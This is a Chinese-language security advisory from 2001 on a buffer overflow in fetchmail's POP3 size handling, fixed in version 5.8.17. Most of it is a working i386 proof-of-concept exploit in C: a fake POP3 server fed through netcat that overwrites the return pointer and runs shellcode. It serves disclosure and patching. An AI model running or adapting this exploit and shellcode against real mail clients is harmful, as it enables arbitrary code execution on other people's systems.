Fetchmail 存在缓冲溢出漏洞发布时间:2001-08-10 更新时间:2001-08-10 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:客户机模式 受影响系统 fetchmail 所有(不包括) 5.8.17之前版本详细描述 攻击者如可以伪造你的DNS解析就可能在你系统上执行任意代码。问题代码 如下所示: pop3.c: static int pop3_getsizes(int sock, int count, int *sizes) [snip] while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0) { int num, size; if (DOTLINE(buf)) break; else if (sscanf(buf, "%d %d", &num, &size) == 2) sizes[num - 1] = size; } [snip] 你可以传递2个整数,num和size,第一个是你offset,第二个是你要写到内存位置中的32值,你可以提供负和正的offsets(num),因此你可以写在sizes指针地址的前和后,要写这个值你需要伪造POP3会话,等待LIST命令,然后发布一个伪造的LIST响应。 测试代码 /* fetchmail proof of concepts i386 exploit * Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org> * Code under the GPL license. * * Usage: ./a.out | nc -l -p 3333 * fetchmail localhost -P 3333 -p POP3 * * This is a bad exploit with offset carefully selected * to work in my own system. It will probably not work in * your system if you don't modify RETR_OFFSET and SHELL_PTR, * but you may try to set the SHELL_PTR to 0xAAAAAAAA * and use gdb to obtain the proof that your fetchmail is vulnerable * without to exploit it. * Or just read the code in pop3.c. * * To improve the exploit portability you may put the shellcode inside * one of the static char buffers, grep 'static char' *.c. * * Tested on fetchmail 5.8.15 running on Linux 2.4.6 * * On success you should see the ls output. */ #include <stdio.h> #define MESSAGES 10 #define RETR_OFFSET -20 #define SHELL_PTR 0xbfffba94 int main(void) { int ish = SHELL_PTR; int ret_offset = -10; char shellcode[] = /* take the shellcode multiple of 4 in size */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0"; int *sc = (int*) shellcode; int noop = 0x90909090; int i; /* +OK for user and password, than report the number of messages */ printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES); /* Overwrite the RET pointer */ for (i = ret_offset-20; i < ret_offset+20; i++) printf("%d %d\r\n", i, ish); /* Put some NOP */ for (i = 1; i < 21; i++) printf("%d %d\r\n", i, noop); /* Put the shell code in the buffer */ for (i = 21; i < 21+(sizeof(shellcode)/4); i++) printf("%d %d\r\n", i, *sc++); printf(".\r\n"); /* POP data term */ return 0; } 解决方案 请使用5.8.17版本 相关信息 |
